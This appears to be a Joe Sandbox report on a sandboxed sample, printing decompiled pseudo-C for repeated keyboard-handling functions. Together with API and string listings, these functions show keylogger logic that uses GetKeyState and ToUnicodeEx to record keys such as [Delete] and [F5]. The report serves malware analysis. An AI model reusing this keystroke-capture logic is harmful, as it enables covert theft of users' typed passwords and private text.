0x00c85c4e
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Home], xrefs: 00C85C49

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85CF1, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85CF1(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Stop]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85cf1
0x00c85cf8
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Stop], xrefs: 00C85CF3

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85A6B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A6B(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Delete]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85a6b
0x00c85a72
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Delete], xrefs: 00C85A6D
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85BE1, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85BE1(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F5]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85be1
0x00c85be8
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F5], xrefs: 00C85BE3
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85C69, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C69(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Mail]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85c69
0x00c85c70
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Mail], xrefs: 00C85C6B
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85AF3, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85AF3(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F14]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85af3
0x00c85afa
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

